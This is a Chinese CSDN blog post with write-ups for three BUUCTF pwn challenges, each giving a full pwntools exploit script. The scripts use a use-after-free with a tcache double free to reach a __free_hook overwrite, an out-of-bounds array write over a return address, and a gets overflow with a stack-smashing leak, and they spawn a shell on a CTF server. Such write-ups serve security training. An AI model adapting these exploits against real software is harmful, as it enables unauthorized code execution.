buuctf 2022 3.9

已于 2022-03-10 20:28:25 修改
阅读量4.7k 收藏
点赞数
分类专栏: PWN 文章标签: 安全 python
于 2022-03-10 14:29:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57754423/article/details/123400803
版权

ciscn_2019_es_1

保护机制:

保护全开

漏洞点:

这里指针未清空,存在uaf漏洞。

利用思路:

首先malloc一个size大于0x408的chunk,这样的话

就可以绕过tcache了。

然后free掉,之后再dump一下,就可以泄露main_arena + 96 的地址了

这样就可以获得 libc的基地址 和 free_hook了

利用tcache 的double free漏洞 修改fd指针 然后malloc 这样就可以写入free_hook为

one_gadget了。

exp:

from pwn import *
from LibcSearcher import * 

local_file  = './es_1'
local_libc  = './libc-2.27.so'
remote_libc = './libc-2.27.so'

context.terminal = ['tmux', 'splitw', '-h']
context.log_level = 'debug'
e = ELF(local_file)
context.arch = e.arch

select = 1
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node4.buuoj.cn',28724)
    libc = ELF(remote_libc)


se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims			    :r.recvuntil(delims)
uu32    = lambda data               :u32(ru(data)[-4:].ljust(4, b'\x00'))
uu64    = lambda data               :u64(ru(data)[-6:].ljust(8, b'\x00'))
info_addr = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))
r.timeout = 1
def one_gadget(filename):
    return map(int, subprocess.check_output([b'one_gadget', b'--raw', filename]).split(b' '))
def dbg(cmd=''):
     gdb.attach(r,cmd)
bss_addr = 0x4080
def add(size,name,call):
    ru(b"choice:")
    sl(b'1')
    ru(b'name')
    sl(str(size).encode())
    ru(b'name:')
    se(name)
    ru(b"compary call:")
    se(call)##0xc
    ru(b"Done!")

def show(index):
    ru(b"choice:")
    sl(b'2')
    ru(b"index:")
    sl(str(index).encode())
    # ru(b"Done!")

def delete(index):
    ru(b"choice:")
    sl(b'3')
    ru(b"index:")
    sl(str(index).encode())
    # ru(b"Done!")

add(0x410,b';/bin/sh\x00',b'1') #0
add(0x10,b';/bin/sh\x00',b'2') #1
add(0x10,b';/bin/sh\x00',b'2') #2
delete(0)
show(0)
ru(b'name:\n')
base = u64(rc(6).ljust(8,b'\x00')) - 0x3ebca0
sys = base + libc.sym['system']
success("libc_addr:" + hex(base))
success("sys_addr: " + hex(sys))
# gadget = 0x4f2c5 0x4f322 0x10a38c
shell = base + 0x4f322
free_hook = base + libc.sym['__free_hook']
delete(1)
delete(1)
add(0x10,p64(free_hook),b'\x00')
add(0x10,p64(shell),b'\x00')
delete(0)

r.interactive()

wustctf2020_name_your_cat:

漏洞点:

存在数组越界,可以直接写入ret_addr

exp:

五次写入,跳出循环,返回shell

from pwn import *

p=remote("node4.buuoj.cn",28477)
#p=process('./wustctf2020_name_your_cat')
elf=ELF('./wustctf2020_name_your_cat')

shell_addr=0x80485cb

p.sendlineafter('Name for which?\n>','1')
p.sendlineafter("Give your name plz: ",'A')

p.sendlineafter('Name for which?\n>','2')
p.sendlineafter("Give your name plz: ",'B')

p.sendlineafter('Name for which?\n>','3')
p.sendlineafter("Give your name plz: ",'C')

p.sendlineafter('Name for which?\n>','4')
p.sendlineafter("Give your name plz: ",'D')

p.sendlineafter('Name for which?\n>','7')
p.sendlineafter("Give your name plz: ",p32(shell_addr))

p.interactive()

wdb2018_guess:

漏洞点:

gets函数存在溢出:

思路:

动态调试,找到argv[0]和输入点的偏移,然后修改argv[0]的值,题目中没有直接给出,所以我们需要再libc中找,这个函数'__environ',这里存了环境变量的值,环境变量保存到栈中,从而得到flag的地址

exp:

#coding:utf-8
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
p = remote('node4.buuoj.cn',29203)
e = ELF("./guess")
p.timeout = 0.5
p.recvuntil(b"Please type your guessing flag")
pl1 = b'a'*(0x128) + p64(e.got['puts'])
p.sendline(pl1)
p.recvuntil(b'stack smashing detected ***: ')
puts_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))

libc = LibcSearcher("puts",puts_addr)	
base = puts_addr - libc.dump("puts")
print(hex(base))
environ_addr = base + libc.dump('__environ')
pl2 = b"a"*(0x128) + p64(environ_addr)
p.recvuntil(b"Please type your guessing flag")
p.sendline(pl2)
p.recvuntil(b'stack smashing detected ***: ')
flag_addr = u64(p.recv(6).ljust(8,b'\x00')) - 0x168

pl3 = b'a'*(0x128) + p64(flag_addr)
p.recvuntil(b'stack smashing detected ***: ')
p.sendline(pl3)

p.interactive()
cut_maize
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linectf2022 online-library_[LineCTF2022]gotm
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-05 858
linectf2022 online-library_[LineCTF2022]gotm linectf2022 online-library源码,分析一下几个路由和对应的请求处理函数, [LineCTF2022]gotm注册功能:func regist_handler(w http.ResponseWriter, r *http.Request) { uid := r.FormValue("id") upw := r.FormValue("pw") if uid == "" ||
selenium3.9
06-28
自动化 selenium 工具包 selenium 3.9 需要的可以进行下载
buuctf 2022 3.10
m0_57754423的博客
03-10 188
gyctf_2020_some_thing_exceting: 漏洞点: 存在uaf漏洞。 思路: 通过uaf漏洞进行double_free,修改fd即可malloc flag所在地。 exp: from pwn import * from LibcSearcher import * context.terminal = ['tmux', 'splitw', '-h'] local_file = './gy1' local_libc = './libc-2.23.so' # re
信息收集道道之外网信息收集
热门推荐
qq_56426046的博客
12-09 1万+
要说简单粗暴还是子域名枚举爆破,通过不断的拼接字典中的子域名前缀去枚举域名的A记录进行DNS解析,如果成功解析说明子域名存在。如xxx.com拼接前缀test组合成test.xxx.com,再对其进行验证。但是域名如果使用泛解析的话,则会导致所有的域名都能成功解析,使得子域名枚举变得不精准。nslookup验证下~泛解析域名,成功解析不存在的域名。普通解析,不存在的域名解析会失败。泛解析:使用通配符*来匹配所有的子域名,从而实现所有的子级域名均指向相同网站空间。会存在域名劫持、域名恶意泛解析风险。
windows10下编译dllib报错踩坑: ERROR: Failed building wheel for dlib
m0_58596092的博客
10-21 6309
ERROR: Failed building wheel for dlib
[LineCTF2022]BB
Sk1y的博客
06-18 1509
八进制,RCE,利用环境变量进行注入
[LineCTF2022]gotm ( golang SSTI + JWT伪造 )
ShenZ的博客
04-15 5288
我们的思路是利用ssti得到secret_key,再伪造jwt即可得到flag。 如果是正常思路我们应该{{.secret_key}}注入得到key字段,但是root_handler函数中得到的acc是数组中的地址,也就是get_account函数通过在全局变量acc数组中查找我们的用户,这种情况下直接注入{{.secret_key}}会返回空 我们的payload应该是{{.}},可以得到 Account结构的所有字段 /regist?id={{.}}&pw=123 /auth?id={{.}}&
LINECTF2022 web之Memo Driver完整题解
qq_38338511的博客
03-18 331
发现flag文件里没有我们需要的flag,以BUU环境的习惯,肯定是又藏在了env环境变量里了。/proc/{pid}/environ 常用来读取环境变量中的SECRET_KEY或FLAG。没绕过request.query和request.queryparam,一个是用。发现还是没有flag,尝试bp爆破PID。(以CTF出题人的习惯)这题重点的地方在于path,会进行读取输出,flag在上一个目录。下载题目源码打开index.py进行分析。
2022DASCTF MAY 出题人挑战赛
Sk1y的博客
05-26 641
2022DASCTF MAY 出题人挑战赛 文章目录2022DASCTF MAY 出题人挑战赛Power魔法浏览器 Power Cookie发包,回显中有个 在cookie加一个 admin=1 得到flag DASCTF{ad2e3900-06dd-4b04-9cec-1a8878a3777f} 魔法浏览器 f12查看 然后修改报文 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
nopcommerce 3.9
04-03
nopCommerce 源代码,学习MVC,EF及面向接口,反转控制等的优质参考内容。
express.js-ctf:用express.js编写的CTF挑战
05-04
express.js-ctf 智力,技能等方面的测试。
SQLite3.9破解
01-18
SQLite3.9破解版本,完全破解,免费永久使用。。。。。。。
fluxion 3.9版本
10-22
Fluxion是一个无线破解工具,这个工具有点像是Linset的翻版。但是与Linset比较起来,它有着更多有趣的功能。目前这个工具在Kali Linux上可以完美运行。 工作原理 1.扫描能够接收到的WIFI信号 ...3.使用WEB接口 ...
2345安全卫士 3.9
10-04
2345安全卫士是集电脑体检、木马查杀、垃圾清理、修复系统漏洞、系统加速、软件管理等功能为一体的电脑安全管理的软件。 强化了主页与浏览器锁定功能,用2345安全卫士锁主页再也
CTF(Pwn) 当题目为我们提供Libc版本.so文件, 与 不提供的区别
半岛铁盒的博客
03-25 4519
做了一道题目,它提供了 libc文件; 这道题 可以使用 libc-2.23.so文件 来 解出来, 也可以不使用; 当使用 libc2.23.so文件时 EXp为 from pwn import * p = remote("node3.buuoj.cn",29829) libc=ELF('libc-2.23.so') elf = ELF('./pwn1') write_plt = elf.plt['write'] write_got = elf.got['write'] main = 0x0804
2022 lineCTF WEB复现WriteUp
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-06 661
lineCTF WEB复现WriteUp Gotm, is_admin == true就给flag,需要伪造token,需要秘钥才行 再往下看,经典SSTI 如果能控制acc也就是id为{{.}},就能得到这三个的值,然后id可控,直接打就行了 接下来思路就很简单了,先注册一个id为{{.}}的用户: is_admin == true就给flag,需要伪造token,需要秘钥才行 再往下看,经典SSTI, 如果能控制acc也就是id为{{.}},就能得到这三个的值,然后id可控,直接打就行了 接下来思路就很
[BUUCTF]PWN——wustctf2020_name_your_cat(数组越界)
mcmuyanga的博客
03-13 1208
wustctf2020_name_your_cat 附件 步骤 例行检查,32位程序,开启了canary和nx 本地试运行一下看看大概的情况 32位ida载入,在检索字符串的时候发现了后门 主要函数
wustctf2020_name_your_cat
z1r0的博客
01-17 627
wustctf2020_name_your_cat 查看保护 可以看到v3是一个数组,而v0是namewhich返回值,假如参数v0可控那么v3就可以被溢出。 v2是namewhich的返回值,这里v2可控,vuln函数中v3可以进行溢出 距离ebp 0x34。0x34 + 4 = 8 * 7 = 56,v2为7时刚好可以覆盖到ret。这时再输入name为shell这个后门函数即可。 from pwn import * context(arch='i386', os='linux', log_lev
qqplayer 3.9
最新发布
07-15
qqplayer 3.9是一款非常流行的多媒体播放器软件。它提供了强大的视频和音频播放功能,可以播放几乎所有常见的视频和音频格式。 首先,qqplayer 3.9具有优秀的视频播放能力。它支持高清和超高清视频播放,能够流畅地...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值